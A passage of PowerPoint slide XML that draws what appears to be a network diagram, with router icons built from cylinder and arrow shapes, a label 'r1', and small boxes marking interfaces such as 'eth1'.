              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9218" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{043E2CED-1C34-A448-DDB1-71C892D105FF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819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t-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9219" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3255CD8D-6FFB-53AB-8410-75F52F74FD36}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9221" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B948F00A-1BC0-ED93-5616-CC10644ECFBF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97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5">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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22" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E5EFE9D-AC3E-D6CD-348E-F6DBA60AC1E5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 1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32">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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36" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEF5AE6-9EF6-AEAE-4B32-F91C29D8C5B8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28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2" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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38" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1527EF18-6342-CB67-D03A-0FA587C82AD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 1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4">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9217" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C28461C-671C-A273-C57A-9AA1E5FCB45C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9251" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE970CB2-C938-E9C6-061F-01CBCE44D119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5002404" y="2547001"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9252" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A4816E-6D63-9748-C99F-20C3B4B74485}"/>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53" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3ACF1EB-9334-12C7-70E0-FF4CEA8942F5}"/>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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9254" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04A3CFF-6138-93D4-CC65-1DF51E549BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989256" y="3258486"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9255" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{324DC53F-807D-7E5A-C384-7B631922E025}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9256" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BF739F-9F90-3CD3-3780-952483836891}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9257" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC082DC-74DF-3B4B-52FE-EA3CDA251989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5008167" y="4928067"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9258" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DCFE79-584D-103A-6290-96D21B025853}"/>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59" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0851CCDD-7F24-08B8-8870-BCBDD61E87B8}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9260" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED2EF20-3E5A-6337-AC65-868E82336DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5013037" y="4230593"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9261" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1905246F-C41F-9ECE-813E-CA4AC2CCC37F}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9262" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D2EA39-FB03-0291-9560-20A0A2FD6AB8}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9263" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5CDE52E-EA65-1F47-DAFD-565102A82E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4962850" y="4602893"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9264" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40AFF6C1-7E7B-BFFA-B394-36A53884E3E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9266" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{690F713E-8F5F-80B4-41F1-3A7BD76D1EA5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819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t-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9267" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8FFF6E-76D6-109E-1D11-EA16FAA8345C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9268" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE7334CD-3168-1F46-FD28-E9D8E132A6C7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97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5">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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69" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F24F64-F89E-C307-C6A6-193584E28275}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 1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32">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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70" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE2E85F-E891-E64F-E71E-A904D19E0383}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28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2" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
